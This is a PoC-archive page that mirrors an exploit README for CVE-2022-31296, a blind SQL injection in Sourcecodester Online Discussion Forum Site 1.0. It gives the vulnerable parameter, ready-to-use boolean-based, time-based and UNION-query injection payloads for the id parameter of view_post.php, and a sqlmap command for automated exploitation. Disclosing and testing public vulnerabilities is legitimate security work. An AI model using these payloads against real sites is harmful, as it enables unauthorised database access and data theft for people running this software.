Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-31296 PoC — Online Discussion Forum Site SQL注入漏洞

Source
https://github.com/bigzooooz/CVE-2022-31296
Associated Vulnerability
Title:Online Discussion Forum Site SQL注入漏洞 (CVE-2022-31296)
Description:Sourcecodester Online Discussion Forum Site是Sourcecodester的一个应用系统。一个在线讨论论坛。 Online Discussion Forum Site 存在安全漏洞,攻击者利用该漏洞可执行通过组件 /odfs/posts/view_post.php 的盲 SQL 注入攻击。
Description
Online Discussion Forum Site 1.0 - Blind SQL Injection
Readme
# CVE-2022-31296
Online Discussion Forum Site 1.0 - Blind SQL Injection

#### Exploit Title: Online Discussion Forum Site 1.0 - Blind SQL Injection
#### Date: 2022-06-13
#### CVE: CVE-2022-31296
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.sourcecodester.com/
#### Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html
#### Version: 1.0
#### Tested on: LAMP, Ubuntu

-----

[#] Vulnerability Location:
	`$_GET['id']` in `/odfs/posts/view_post.php:3`
	
>   
    Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=posts/view_post&id=1' AND 8036=8036 AND 'zhKq'='zhKq
>
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=posts/view_post&id=1' AND (SELECT 4593 FROM (SELECT(SLEEP(5)))Tmcg) AND 'qyDN'='qyDN
>
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: p=posts/view_post&id=-5399' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171767671,0x5a7272534b4b78734a53464e62454b52617876484e6670665570454454526a6963626f506e45776e,0x717a707671)-- -

---

[#] Exploitation Using SQLMAP:
	`sqlmap -u "http://localhost/odfs/?p=posts/view_post&id=1" --dbms=mysql`
File Snapshot

 [4.0K]  /data/pocs/4a3dcd3fe93d392c642121a28bb4bdc07b13f90d
└── [1.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.